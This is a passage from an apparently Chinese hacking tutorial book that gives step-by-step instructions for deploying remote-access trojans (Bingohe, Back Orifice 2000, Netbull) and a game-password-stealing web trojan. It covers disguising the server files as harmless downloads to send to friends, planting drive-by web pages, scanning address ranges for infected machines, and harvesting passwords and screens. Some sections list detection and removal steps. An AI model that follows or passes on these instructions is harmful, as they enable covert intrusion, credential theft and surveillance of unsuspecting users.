按钮或选择【文件】→【自动搜索】命令,这时就可以看到弹出的【搜索计算机】窗口,如图 3-20 所示。 ③ 在输入好【起始域】【起始地址】以及【终止地址】后,单击【开始搜索】按钮,“冰河”就开始搜索(扫描)指定网段中所有 7626 端口开放的计算机了,如图 、 3-21 所示。 ④ 完成搜索后,就可看到如图 3-22 所示在【搜索结果】列表框中显示的搜索结果了。 图 3-20 【搜索计算机】窗口 图 3-21 开始搜索 图 3-22 搜索结果 在该【搜索结果】列表框中,ERR 表示其对应的计算机没有开放 7626 端口,OK 表示其对应的计算机开放了 7626 端口。 所以,在如图 3-22 所示的对话框中,就可以知道 IP 地址为 61.52.142.26 的计算机中了“冰河”。同时中了“冰河”的计算机的 IP 将自动被添加到“冰河”客户端 程序的【文件管理器】选项卡中,这样,就可以对其进行操作了。 3-3-2 执行者 4.3 的木马安装配置 其实木马传播的方式很简单,用户可以通过 QQ、邮件或干脆在别人的电脑上直接下载木马文件并执行木成文件。 当然了,最后一种方式既不乐观也不实际,那通过其他方式总不能直接把木马程序传给对方,让对方直接运行吧?所以一种很实用也很便捷的木马传播方式:网页木 马自然就派上用场了,有了网页木马程序,只要对方浏览了该网页地址,对方的电脑就可能会自动下载了木马并且自动在后台运行起来。 这里给大家介绍一款由陈经韬先生制作的 exe2bmp.exe(执行着)木马,可通过进入黑白网络 http://www.heibai.net 或者小凤居 http://www.chinesshack.org 下载专 区进行下载,也可以通过其官方网址:http://www.8573.net /DOWNLOAD.ASPX 进行下载,下载后保存在“D:\木马配置”目录如图 3-23 所示。 大家千万不要以为该图下载的程序就是所谓的木马,这只是木马的配置程序。 (请注意区分程序图标为文本文件图标)下载配置程序后,就是配置程序了,如果自己 是“执行者”的会员的话,那就可以直接进入配置那一步了,如果是还没有来得及注册,那就需要登陆其网站进行会员注册,并且执行者的版本升级是全免费、永远 性的、支持自动升级。所以新老会员不用考虑收费的问题,请放心大胆的使用吧。 如果已经注册了,那就直接去看具体的配置,如图 3-24 所示,在网站页面的登陆框下有一排链接,点选会员注册,进入服务条款声明页面,点选【我同意】即可进 入注册资料填写,在配置木马时将用上的密码和确认密码都填一个相同的密码。譬如用户名填:test001 密码填:001test 信箱需真实填写,以后如果忘记密码就全靠 它了,如图 3-25 所示。 单击【确定】后,如系统提示注册成功,则表示已经成功的注册成为执行者会员了。接下来就可以开始进入配置木马这一项了。如果系统出错,那就检查一下自己的 填写是否有错,当然如果系统繁忙,就等等再试试!注册好了会员,就看下一步如何配置木马程序了!

执行如图 3-23 所示的配置程序,也就是大家从网站上下载下来的那个文件,其实配置很简单,如图 3-26 所示。在会员名输入框里填入刚才注册成功的会员名 test001, 然后点选【生成服务器】按钮即可。如果用户名填写正确的话,那就会出现生成木马成功的提示。 图 3-23 木马配置程序 图 3-24 进行会员注册 图 3-25 填写注册资料 再返回到如图 3-23 所示的“D:\木马配置”目录,出现如图 3-27 所示。 比较图 3-23 和图 3-27,会发现该目录下已经多出了另外一个文件 consoleserver.exe,该文件就是为自己生成的专用木马。这个木马程序中已经捆绑了自己的用户名, 以后该木马程序所截取的帐号密码信会自动分到自己的会员名下。 图 3-26 生成服务器 图 3-27 生成木马之后 该程序只有 19K,可以通过各种方式进行种植,当然了,如果对木马熟悉的话,也可在本机运行,该程序运行后无任何提示,自动隐藏到后台监视并截取游戏帐号密 码。 木马工作的基本原理:所有的木马都必须运行后才可以发挥截取密码的作用,如果只是配置好了木马就以为可以收信,那就错了,简单地说,如果想收信就必须保证 木马在运行,所以要想办法让自己的木马运行起来。 值得注意的是,网页木马需要有虚拟主机空间存放,并且需要支持 ASP 脚本语言,如果有的话最好不过了,如果没有,那就得自己去想办法弄个 ASP 空间,申请免 费 ASP 空间并不一定支持上传可执行程序,所以急用的朋友可以自己想办法去弄个临时空间存放。 执行 exe2bmp.exe 文件,出现如图 3-28 所示的画面,然后选择已经配置好的木马路径地址,点击【生成】按钮即可,生成工具会在自己的木马相应路径下生成 3 个 相应文件:bintext.bmp;bintext.htm 和 bintext.asp。用户只要把 bintext.htm 改成如 love.htm 或 index.htm 等好记或好听的文件名,这样更能迷惑来浏览该页面的人。 大家看到如图 3-29 所示的这 3 个被红线圈中的文件了吗?这 3 个文件就构成了网页木马。将这 3 个文件上传到自己的 ASP 空间,然后将 consoleserver.htm 相应的 网页地址记下来,这个地址以后可以在 QQ 上发放给一些自己认为可以下毒手的朋友,只要对方浏览了该文件,那么对方的电脑就会自动种上该专用木马了(注意是 这 3 个文件必须都在同一个空间目录,而且缺一不可) 。 图 3-28 执行 exe2bmp.exe 文件 其实 consoleserver.bmp 实际上就是转变后的木马文件,还有就是 consoleserver.hmp 和 consoleserver.asp 最好不要变更名称,如果要变更名称,那最好也相应改 变代码里的链接文件名称。 假设有人已经种了自己的木马,那如何查看自己的“马儿”所截取来的密码呢?现在进入下一个步骤——如何接收密码信件? 首先访问首页,在登陆框里填入申请好的帐号和密码登陆后,网站会弹出一个窗口,该窗口显示的是自己的会员信息,如果需要修改密码可以在此页面修改。如果要 查看密码,可以直接关闭该信息窗口,切换到刚才登陆的窗口,如图 3-30 所示。 如果是用自己的帐号进行登录的,则显示的欢迎信息将会有所不同,如图 3-30 所示。请注意下面的会员区比登陆前多了几个链接,选择【木马工作结果查询】后进 入工作结果查询页面,如图 3-31 所示。 图 3-29 网页木马文件 图 3-30 选择【木马工作结果查询】 图 3-31 木马结果查询 请大家注意查询日期,必须是规范格式,还有必须选择查询的密码所属游戏类型,再单击【查询】按钮,这样,最终结果就会显示在自己面前了。该页面还有一些删 除记录链接,用户可以根据自己的需要使用。 3-3-3 创建与目标计算机木马程序的连接 在完成上面所述的搜索以后,就可以与目标计算机的木马服务器程序建立连接了,如图 3-32 所示。 这时就需要在【当前连接】中选择搜索到符合要求的 IP 地址,然后输入访问口令,怎么样,是不是已经与目标计算机建立连接了? 不过,由于上面讲到的方法是在不知道目标计算机 IP 地址的情况下使用的。如果已经知道了目标计算机的 IP 地址,并且知道了它的访问密码,那么,就可以直接将 该目标计算机添加到客户端中了。 下面再来看一下直接添加中“冰河”计算机的操作步骤: ① 在主窗口中直接单击 按钮或在菜单选择【开始】→【添加主机】命令,将弹出【添加计算机】对话框,如图 3-33 所示。 图 3-32 与木马服务器程序建立连接 图 3-33 【添加计算机】对话框 ② 根据对话框提示输入【显示名称】【主机地址】 、 (即目标计算机的 IP 地址)以及【访问口令】等内容,最后在单击【确定】按钮后,就可以看到这个 IP 地址已经 被添加到“冰河”客户端程序的【文件管理器】选项卡中了。 【注意】 在本书后面的讲解中,笔者还会讲述到“冰河”的其他版本,为什么这样讲呢?一个是这个木马程序太出名了,网上遍地都是;二是对不同版本介绍后,好让读者有 一个比较。 3-4 常用木马例说 下面来剖析几个常用的木马,希望大家能够对其有一个深入的认识。 3-4-1 冰河木马的远程控制技术 首先到网上下载一个“冰河”软件(这里下载的是“冰河 V2.2”) ,解压后将看到三个文件:G_Server.exe、G_Client.exe、Readme.txt。G_Server.exe 是被控端 软件,用来安装在别人电脑里的文件,可以任意更名,双击没有任何反映,但其实已经悄悄的安装在电脑中了。G_Client.exe 是控制端软件,也就是安装在自己电脑 中的软件,用来监控别人的电脑。Readme.txt 就不用说了。 可以通过 E-mail 或 QQ 将传给别人并 G_Server.exe 文件安装到他的机器中,如果怕别人不接受,则还可以将其更名为 MM.exe 或 Love.exe,然后骗他说,这是很

好玩的东东,他一双击就搞定了。 另外还可以用文件合并工具把一个很好玩的游戏程序文件和 G_Server.exe 文件合并,然后再传给他,在别人双击玩游戏的同时,G_Server.exe 文件也就悄悄安装好 了。 1.配置被控端程序 在传输 G_Server.exe 文件前,还要利用 G_Client.exe 文件对其进行一些配置。双击 G_Client.exe 文件,将弹出如图 3-34 所示的程序界面,接着进行如下操作: 图 3-34 程序界面 ① 在 G_Client.exe 程序主界面,单击【配置本地服务器程序】按钮。 ② 在弹出来的【服务器配置】对话框中点选【邮件通知】选项卡,然后填入 E-mail 地址和发送服务器,如图 3-35 所示,这样被控端软件将每次拨号后产生的 IP 地 址都发送到自己设定的 E-mail 中。因为现在很多用户采用拨号上网或者采用动态 IP 的 ADSL 宽带上网,每次拨号后的 IP 都不一样。但有了这一步的设置,只要对 方一开机上网,就能获得其 IP 并连接到他电脑了。 ③ 单击【基本设置】选项卡,在其中设定一个访问口令,这样只有通过此口令才能访问到被控端的电脑,防止别的装有“冰河”控制端的用户访问,如图 3-36 所示。 图 3-35 输入 E-mail 地址和发送服务器 图 3-36 设定访问口令、“√”选中“自动删除安装文件”项 “√”选中“自动删除安装文件”,则被控端软件安装后将自动把原安装文件删除掉,不留任何痕迹。 ④ 最后按【确定】按钮,被控端软件就配置好了。 当然,还有一些无关重要的选项,如果需要则可以根据自己的实际情况酌情设置,如可以更改监听端口(范围在 1024~32768 之间) 。 2.搜索并远控目标电脑 除了从 E-mail 中得到 IP 地址外,还可以通过控制端软件进行自动搜索(也可以使用其它搜索工具) ,具体操作步骤如下: (1)单击主界面中的【自动搜索】按钮,在弹出的对话框中输入起始域和起止地址,如搜索 192.168.0.1 到 192.168.0.255 之间的 IP 地址,则可以在“起始域”中 输入 192.168.0,在“起始地址”中输入 1,“终止地址”中输入 255。 (2)然后单击【开始搜索】按钮即可,如图 3-37 所示。 “搜索结果”框中以“OK”开头的 IP 就可能是自己要找的了,控制端软件将会自动将其添加到文件管理器中,因为互联网上感染冰河木马的不只是一台电脑,搜索 到的很可能是别人中下的木马,此时就得根据自己设定的口令验证了。 那么,应该如何进行远控目标电脑呢?不妨进行如下步骤的操作: ① 单击【自动搜索】按钮,在弹出来的“搜索计算机”对话框中输入“起始域”、起止地址(监听端口一般默认为 7626,不用管) ,然后单击【开始搜索】按钮, 搜索完毕单击【关闭】按钮即可。 图 3-37 设置搜索范围并进行搜索 ② 在“文件管理”框中,选择一台自动添加进来的电脑 IP,然后在“访问口令”框中输入设定的口令,单击【应用】按钮,如图 3-38 所示。如果能够访问电脑中的 文件,则证明这台电脑就是自己的目标电脑。这样就可以在别人的电脑上“胡作非为”了! 图 3-38 输入设定的口令并单击【应用】按钮 当然了,如果通过别的途径得到了被控端的 IP 地址,则可以直接单击【添加主机】按钮,然后在弹出来的对话框中输入 IP 地址和访问口令,如图 3-39 所示,点按 【确定】按钮即可。 ③ 除了在【文件管理器】标签中访问、上传、下载文件外,在【命令控制台】标签中还能获取系统信息、获得各种口令、关机、*簟⒎梦时嗉⒉岜淼雀髦植僮鳌 如图 3-40 所示,单击【口令类命令】→【系统信息及口令】命令项,然后单击【系统信息】按钮便能查看到被控端电脑的系统信息,单击【开机口令】按钮便能查 看到被控端电脑的开机口令,单击【缓存口令】按钮便能查看到被控端电脑上的各种共享访问口令。 图 3-39 直接添加主机 图 3-40 单击【系统信息】按钮 ④ 其中最有意思的莫过于“捕获屏幕”功能了,单击【控制类命令】→【捕获屏幕】命令,然后单击右边的【查看屏幕】按钮便能查看被控端的当前屏,如图 3-41 所示幕,如果单击【屏幕控制】项,则被控端的一举一动自己都可以看见,并且还能对其进行操作,当然了,最好还是不要操作,要被发现那就会“惹火上身”了。 3. 如何将“冰河”木马卸载和清除 “冰河”木马在目标电脑上装上去后,如果控制端要卸载,操作非常简单,在【命令控制台】标签中单击【控制类命令】→【系统控制】命令,然后单击右边的【自 动卸载冰河】按钮即可,如图 3-42 所示。 图 3-41 捕获屏幕功能 图 3-42 卸载“冰河” 假如自己的电脑感染了冰河木马(像 Norton、金山毒霸等杀毒软件都可以查到) ,可以通过以下方法清除: ① 以安全模式重新启动计算机。 ② 检 查 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 和

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices 两处是否有同名的可疑程序名 (默*沧拔 kernel32.exe) 如果有则删除该键 , 。 ③ 检查 HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command 处的键值是否为“\notepad.exe %1”(是指自己的 Windows 所在目录,如

“c:\windows”) ,“冰河”的默认设置是将该处键值修改为“sysexplr.exe %1”,请自行作相应修正。 ④ 检查 HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command 处的键值是否为“"%1" %*”,如果不是则进行修正。 ⑤ 删除找到的可疑程序 (默认文件名目录下的“kernel32.exe”和“sysexplr.exe” 如果“sysexplr.exe”因正在运行而无法删除 可以在第 6 步完成之后立即删除) , , 。 ⑥ 如果是 Windows 9X 系统,直接按两次 【Ctrl+Alt+Del】 快捷键重新启动计算机;若是 NT 系统,按 【Ctrl +Alt +Del】 快捷键激活 【任务管理器】 并结束 kernel32.exe 进程,然后重新启动计算机即可。 最好还应该在修改注册表之后再删除可疑程序,否则对方如果将“冰河”设置为与 EXE 文件关联,那就连运行注册表编辑器的机会都没有了。另外在修改注册表时 可能已经启动了与 EXE 文件关联的“冰河”,而“冰河”在正常关闭时将会再次修改注册表,所以在 Windows 9X 系统下通过按【Ctrl +Alt +Del】快捷键来重新启 动计算机是至关重要的一步。 3-4-2 剖析 Back Orifice 2000 木马 利用 BO2K(Back Orifice 2000,BO2000)木马可以通过互联网去控制远端机器的操作和取得信息,利用这个功能我们可以利用它搜集信息,执行系统命令,重新 设置机器,重新定向网络等。只要远程机器执行了 BO2K 的服务端程序,就可以连接这部机器,利用它做为控制远程机器和搜集资料的工具。 BO2K 是根据 Windows 环境下的 TCP/IP 协议编写的,它支持多个网络协议,可以利用 TCP 或 UDP 来传送数据,还可以用 XOR 加密算法或更高级的 3DES 加密算 法来对传送的数据进行加密。 1. BackOrifice 2000 的使用 (1)BO2K 服务器端程序配置 BO2K 的图标如图 3-43 所示,在把 BO2K 的服务器端程序 BO2K.EXE 植入想要攻击的计算机(受控机)之前,需要对 BO2K.EXE 进行配置。BO2K 服务器的配置 相当简单,只要根据其配置向导进行选择就可以了。向导会指导用户进行几个设置,包括服务器文件名(可执行文件) 、网络协议(TCP 或 UDP) 、端口、密码等。 配置 BO2K.EXE 的步骤如下所示: ① 用鼠标双击 BO2K 服务器配置程序 bo2kcfg.exe 文件,然后用鼠标单击【BO2K 配置向导】中的【下一个】按钮,出现如图 3-44 所示的对话框,要求选择作为 BO2K 服务器的文件。选择好后单击【下一个】按钮; ② 这时来到【网络类型】选择对话框,选择一个网络类型后单击【下一个】按钮;这时向导要求输入端口地址,如图 3-45 所示,在【挑选端口编号】文本输入框中 输入一个端口编号,然后单击【下一个】按钮。 图 3-43 BO2K 的配置图标 图 3-44 选择作为 BO2K 服务器的文件 图 3-45 挑选端口编号 ③ 这时向导要求选择【加密类型】 ,选择一种加密类型后,单击【下一个】按钮。接着向导要求输入口令,如图 3-46 所示。当在文本输入框中输入口令后,单击【下 一个】按钮。 ④ 已经可以看到向导提示配置完成,用鼠标单击【完成】按钮即可。 ⑤ 出现如图 3-47 所示的【BO2K 服务器配置】窗口,从这里可以对 BO2K 服务器文件进行更详细的设置。 图 3-46 输入口令 图 3-47 【BO2K 服务器配置】窗口 ⑥ 用鼠标单击【打开服务器】按钮,弹出【打开】对话框,选择要打开的 BO2K 服务器文件,如图 3-48 所示。 图 3-48 选择要打开的 BO2K 服务器文件 图 3-49 对服务器文件进行设置 ⑦ 选择好以后,单击【打开】按钮,返回到【BO2K 服务器配置对话框】窗口,可以对服务器文件进行设置,如图 3-49 所示。 (2)BO2K 客户端界面 对 BO2K 的服务器端程序设置完成之后,可以利用各种方法把 BO2K 植入到想要监控的计算机中,然后就可以利用 BO2K 的客户端程序对远程中 BO2K 木马的计算 机(称为受控机)进行监控了。打开 BO2K 客户端监控程序 BO2KGUI.EXE,它的服务器列表和服务器命令可以任意拖拽、组合,客户端的背景也有内定选项提供。 (3)BO2K 的控制操作 等服务器程序配置完毕,再将它发送给对方,对方执行以后,就可以通过运行 BO2K 控制程序 bo2kgui.exe 来进行控制。 具体操作步骤如下: ① 用鼠标双击 bo2kgui.exe 文件,出现如图 3-50 所示的 BO2K 客户端监控程序窗口。 图 3-50 BO2K 客户端监控程序窗口 ② 用鼠标单击【文件】菜单下的【新服务器】选项,弹出【编辑服务器设定】对话框,如图 3-51 所示。 ③ 在【服务器名字】和【服务器地址】文本输入框中输入正确的服务器名字和地址,然后再选择【连接类型】【默认加密】和【证明】这三个下拉列表中的选项。 、 ④ 一切设置好后,单击【好】按钮,出现【Server Command Client】操作框,如图 3-52~图 3-55 所示,这里 BO2K 的控制操作明显和现在使用的完全可视化控制 操作不同,其命令的执行有点类似 DOS 环境下的操作。 图 3-51 【编辑服务器设定】对话框 图 3-52 控制操作图 1 图 3-53 控制操作图 2 图 3-54 控制操作图 3 请大家一定要熟记这些命令,BO2K 的精华可都在这里面哦!!! BO2K 的操作界面对初次使用木马的人来说根本摸不到头绪,更不要说怎么能用好它了,这点新手要了解。 经常使用漏洞入侵的朋友都知道,收集肉鸡的口令信息,设置后门比较繁琐,不过现在好了,只要借用 BO2K 的部分功能就可轻松达到自己的目的。推荐大家使用 BO2K 是因为它对网络功能的支持非常稳定而且全面。

2.BO2K 的检测 下面笔者介绍几种 BO2K 木马的检测方法,木马的检测和清除一般都是在中了木马的计算机(受控机)上进行的。 (1)联网监控法 联网监控法实际上是检测所有木马程序的有效方法,但使用这种方法需要对网络知识有较深的了解,其操作步骤如下: ① 打开 Windows 的 DOS 命令窗口。 ② 在 DOS 命令窗口中键入“netstat –a”命令,该命令的作用是监控本机的网络连接情况,显示网络协议及端口等信息,该命令的运行结果如图 3-56 所示。 图 3-55 控制操作图 4 图 3-56 netstat -a 命令 ③ 在“netstat –a”命令的执行结果中,检查当前计算机是否有可疑端口开着, (这就要求用户对系统的默认端口比较熟悉)如果发现可疑端口,表明很有可能中木 马了。 ④ 如果 BO2K 使用 UDP 端口这个方法就不起作用了。 (2)注册表检查法 BO2K 运行时必须修改注册表,因此可以根据它的这个特点抓到它的“狐狸尾巴”。 被 BO2K 修改过的注册表应该包含下列特征: 如果操作系统是 Windows 9X,那么下面的注册表将会被 BO2K 修改: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices] "UMGR32.EXE"="C:\\WINDOWS\\SYSTEM\\UMGR32.EXE” 如果操作系统是 Windows NT 或者 Windows 2000,则被 BO2K 修改的注册表项为: ① [HKEY_LOCAL_MACHINE]下的 \SYSTEM\ControlSet001\Services\Remote Administration Service "Type"=00000110 "Start"=00000002 "ErrorControl"=00000000 "ImagePath"=:C:\WINNT\System32\UMGR32.EXE” "DisplayName"="Remote Administration Service" "ObjectName"="LocalSystem" ② [HKEY_LOCAlL_MACHINE]下的 \SYSTEM\ControlSet001\Services\RemoteAdministration Service\Security "Security"= (一大串 16 进制码) ③ [HKEY_LOCAlL_MACHINE]下的 \SYSTEM\ControlSet00l\Services\Remote Administration ServicelEnum "0"="Root\LEGACY_REMOTE ADMINISTRATION SERVICE\0000" "Count"=00000001 "Nextlnstance"=00000001 通过检查上述的注册表内容,可以检测出系统中是否中了 BO2K 木马。 【注意】 由于 BO2K 在 Windows NT 或 Windows 2000 中的进程里也是隐身的,所以,它就能够为进程多申请一些内存,然后自己寄生到这些内存中,使用户无法通过检测 当前进程来找到它。 3.BO2K 的清除 只要知道了 BO2K 的底细并找到了它的踪迹,要清除它就容易的很了。 在 Windows 9X 系统中清除 BO2K 木马的方法如下: ① 重新启动计算机,在开机启动菜单中选择[command prompt only]菜单项,进入纯 DOS 模式,在 DOS 命令行中删除文件名以 UMGR32 打头的文件,具体的命令 格式为:del umgr*.* ② 然后删除 BO2K 在注册表中增加的内容。 在 Windows NT/2000 系统中清楚 BO2K 木马的方法如下: ① 按组合键 Ctrl+Alt+Del,打开【Windows 安全】对话框,在该对话框中单击【任务管理器】按钮,打开 Windows 任务管理器。 ② 在 Windows 任务管理器中单击[进程]选项卡,在【进程】选项卡中找到 UMGR32.EXE 的进程。选中之后,单击【结束进程】按钮,结束进程。 ③ 然后打开注册表编辑器,在注册表编辑器中手工恢复被 BO2K 修改和增加的内容。 ④ 删除系统中的 UMGR32.EXE 文件。 使用修改注册表清除 BO2K 木马:

注册表里[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ RunServices]“UMGR32.EXE”=“C:\ WINDOWS\SYSTEM\UMGR32.EXE” (就是它了) ,在删除 umgr 键值后,可以在 Windows 状态下直接删 umgr32.exe 源文件,不需要重新启动。 对于 BO2K 的检测和清除,也可以使用常见的木马检测和清除工具来完成。 3-4-3 揭开“网络公牛(Netbull)”的面纱 网络公牛(Netbull)是一个不带任何权限限制的远程控制软件,该软件在局域网和因特网上,甚至在无网络状态时仍可以用电话和 Modem 完成对服务器的控制。 Netbull 1.1 版中的控制端的文件如图 3-57 所示。服务端大小为 213K,改名后发给别人运行即可。双击打开网络公牛的客户端程序 Peep.exe,如图 3-58 所示。连接 后的基本操作与前面介绍的木马操作无明显差异。 1.在服务器端配置程序 在把网络公牛木马植入目标主机前,需要对它的服务器端程序做一些设置,方法如下: ① 需要先在客户端程序 Peep.exe 的窗口中,选择菜单【配置服务器】→【设置】命令,打开如图 3-59 所示的【打开】对话框。 图 3-57 Netbull 1.1 版中控制端的文件 图 3-58 网络公牛的客户端程序的主窗口 ② 在【打开】对话框中,选择需要设置的网络公牛的服务器端程序,即 PeepServer.exe,选择完成之后,再接着单击【打开】按钮,这时候就会出现图 3-60 所示 的【服务器参数设置】对话框了。 ③ 在【服务器参数设置】对话框中,可以设置自己需要发送 Email 的 SMTP 服务器和收取 Email 的邮箱地址。 图 3-59 【打开】对话框 图 3-60 【服务器参数设置】对话框 这样一来,只要网络公牛能够植入目标主机,服务器端程序会自动把当前主机的 IP 地址发送到指定的邮箱中,而在该对话框中设置的邮箱就是用来接收 IP 地址的。 在客户端连接服务器完成之后,还可以对服务器中的参数进行一些自己的设置。 ④ 这时候运行 buildserver.exe 程序,则会在当前目录下产生一个 newserver.exe 文件,如图 3-61 所示,它就是网络公牛的服务器端程序。 ⑤ 在这里可以把 newserver.exe 任意改为自己喜欢的名字,然后再通过某种手段把它植入目标主机。 newserver.exe 在服务器端运行后,会自动变成为文件 checkdll.exe(即 peepserver.exe) ,放在 C:\Windows\system(Windows 9X)或者 C:\WINNT\system32 (WindowsNT/2000)文件夹下。值得高兴的是,check.dll 被设置成了开机而自动运行。 网络公牛的服务器端程序在运行后会自动捆绑以下文件: 在 Windows 9X 中: notepad.exe,write.exe,regedit.exe,winmine.exe,winhelp.exe 在 Windows NT/2000: notepad.exe,regedit.exe,reged32.exe,drwtsn32.exe,winmine.exe 图 3-61 生成网络公牛的服务器端程序 此外,服务器端程序还会捆绑在开机可自动运行的第三方软件上(如 realplay.exe) 。 网络公牛的服务器端程序运行后,会自动向设置好的信箱发一封 E-mail,告知服务器端程序开始运行的时间,以及目标主机的 IP 地址。并且,服务器端程序每隔 10 分钟查询一次目标主机的 IP 地址,当目标主机(受控机)的 IP 地址发生改变时,会发送 E-mail 进行通知。 2.客户端的远程监控 在把网络公牛的服务器端程序植入目标主机后,就可以使用客户端对目标主机进行监控了,具体监控操作步骤如下: ① 双击网络公牛的客户端 EXE 文件 Peep.exe,打开网络公牛监控窗口。 ② 在网络公牛监控窗口中,选择菜单【文件】→【增加主机】命令,打开图 3-62 所示的【连接】对话框,在该对话框中,输入主机名称(这个主机名称只是为了便 于记忆,无实际用途) ,重点是要输入主机的 IP 地址,这里以 102.102.102.153 为例。连接设置完成之后,在【连接】对话框中单击【OK】按钮,客户端监控窗口 如图 3-63 所示。 图 3-62 【连接】对话框 图 3-63 连接设置完成 ③ 在网络公牛的客户端监控窗口中,主要的菜单是【命令选项】 ,如图 3-64 所示。 【命令选项】菜单下包括了所有的监控命令,包括: ● 连接:与服务器端程序连接的命令。 ● 断开连接:与服务器端程序断开连接的命令。 ● 控制台:得到目标主机信息的命令。 ● 浏览器:浏览目标主机文件系统的命令。 ● 捕获屏幕:查看目标主机当前屏幕内容的命令。 因为所有监控命令都要在与目标主机连接之后才能执行,所以首先要与目标主机连接。 ④ 这时候就需要在网络公牛客户端窗口中选择目标主机,选择菜单【命令选项】→【连接】命令,连接成功之后,给出连接成功或失败的提示,如图 3-65 所示。 图 3-64 【命令选项】菜单 图 3-65 提示连接失败或成功 接着选择菜单【命令选项】→【控制台】命令,打开【控制台】对话框。在【控制台】对话框中,共有 5 个选项卡,包括:系统信息、消息、进程管理、查找、服务 器在线修改。

⑤ 单击其中的【系统信息】选项卡,然后单击选项卡中的【系统信息】按钮,在【响应】文本框中会显示目标主机的系统信箱。 通常情况下,在使用系统信息监控命令后,就会显示出目标主机的计算机名、CPU 的类型、内存大小和使用百分比,操作系统的类型以及各硬盘驱动器的总容量和 剩余容量。这时候如果看到硬盘驱动器的总容量和剩余容量的显示都有问题,则表明网络公牛不能正确地显示受控机上的硬盘使用情况。 如果目标主机上这时候设置有缓存的密码,则在单击【获取密码】按钮后,在【响应】文本框中就会显示出所有缓存的密码。 ⑥ 单击【消息】选项卡,然后在【消息】选项卡中输入消息的标题和内容,再单击【发送】按钮,在【响应】文本框中会显示消息发送的结果了。如果消息发送成 功,这时在目标主机上就会弹出消息对话框。 ⑦ 单击【进程管理】选项卡,在该选项卡中,可以对目标主机的进程进行管理。在【进程管理】选项卡中有列举进程、删除进程、创建进程 3 个进程管理的命令。 单击【列举进程】按钮,在【响应】文本区中会显示目标主机上运行的所有进程,并且列出了各个进程的进程号,进程的名称以及进程所包含的线程个数。 如果要删除目标主机上正在运行的某个进程 首先要指定进程号 可以在 , , 【响应】 文本区中复制要关闭进程的进程号 如删除的最后—个进程是 SPOOL32 把 SPOOL32 , , 的进程号 FFFC934D 粘贴到【删除进程】按钮右边的文本框中,然后单击【删除进程】按钮,控制台就会提示进程是否被成功删除。 ⑧ 如果想要在目标主机上创建一个新进程,需要指定新进程的名称。例如要在目标主机上打开画图工具的进程,就在【创建进程】按钮右边的文本框中输入画图工 具的进程名称 mspaint,然后单击【创建进程】按钮,控制台就会提示进程是否创建成功。此时若再列举进程,就会发现画图工具的进程 mspaint 也包括在进程列表 中。 ⑨ 单击【查找】选项卡,在该选项卡中可查找目标主机上的文件。在【查找文件】按钮右边的文本框中输入要查找的文件的名称,在【查找路径】文本框中输入查 找的路径,然后单击【查找文件】按钮,查找的结果就会显示出来。 单击【服务器在线修改】选项卡,在该选项卡中,可以在线修改网络公牛服务器端的邮箱设置。SMTP 以及邮箱地址的设置也可以在对服务器端程序进行配置的时候 进行设置,这里可以在线修改以前的设置,设置完成之后,别忘了单击【设置生效】按钮; ⑩ 在选择【命令选项】→【浏览器】命令,就会打开【文件管理器】窗口。 在【文件管理器】窗口中,可以对目标主机上的文件进行各种操作,就像在目标主机上利用【Windows 资源管理器】对文件进行操作一样。在【文件管理器】窗口中, 可以打开、执行、删除、重命名目标主机上的文件,以及查看和修改文件的属性,并且能够从目标主机上传和下载文件。 使用网络公牛还能够捕获目标主机的屏幕。在菜单中选择【命令选项】→【捕获屏幕】命令,就会打开【屏幕流】窗口,在该窗口中,我们可以看到目标主机当前的 屏幕了,和我们在目标主机前看到的内容是一样的。 在【屏幕流】窗口中,可以设置屏幕缩放比例,以及屏幕的刷新时间。如果选择了菜单【选项】→【本地鼠标、键盘有效】命令,在【屏幕流】窗口中,可以使用本 地的鼠标和键盘来操纵目标主机,就像在使用目标主机的鼠标和键盘一样。如果在【屏幕流】窗口中单击鼠标右键,则会弹出目标主机桌面的快捷菜单。 3.网络公牛的检测和清除 ? 网络公牛的检测 由于网络公牛采用了文件捆绑功能,把自己和 Windows 系统上的一些文件捆绑在了一起,因此检测起来十分麻烦。 不过不要担心,因为采用捆绑功能的木马通常都有一个缺点:容易暴露自己。只要大家稍微留意一下,就可能发现某个文件的长度发生了变化,从而怀疑自己是否中 了木马。 例如,中了网络公牛木马之后,Windows 中的记事本 notepad.exe 会和网络公牛的服务器端程序捆绑起来,可以来检查记事本 notepad.exe 的大小,从而检测出是否 中了网络公牛木马。 正常的 notepad.exe 文件大小为 52KB,在如图 3-66 所示中,如果 notepad.exe 文件的大小已经变大(一般为 194KB) ,因此,就可以怀疑其是中了网络公牛木马。 图 3-66 检查 notepad.exe 文件的大小 另外,因为网络公牛服务器端程序的默认连接端口为 23444,也可以利用“netstat –a”命令来检测计算机中是否打开了这个端口,如果打开了,则表明很有可能中 了网络公牛木马。 如图 3-67 所示,看到计算机并没有打开端口 23444,这也就是表明计算机可能还没有中网络公牛木马。如果网络公牛的客户端正好跟服务器端处于连接状态,使用 “netstat –a”命令还可以查到网络公牛远程客户端的 IP 地址或者计算机名称。因为中了网络公牛木马之后,注册表将被修改。 网络公牛修改注册表位置为: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 检查一下注册表,如图 3-68 所示,就可以看到在自己的注册表键中添加了一项,指向 C:\Windows\SYSTEM\Checkdll.exe。 图 3-67 检查端口 图 3-68 查看注册表 ? 网络公牛的清除 以 Windows 9X 为例,网络公牛手工清除的具体操作步骤为: ① 用任意进程管理软件(也可用网络公牛的进程管理功能)中止 Checkdll.exe 的进程。 ② 再找到 C:\Windows\System 下的 Checkdll.exe、KeyCap.dll、alluser.dat、ieuser.dat 文件并将其删除。 ③ 最后再来查看以下文件的大小: notepad.exe 52KB write.exe 20KB

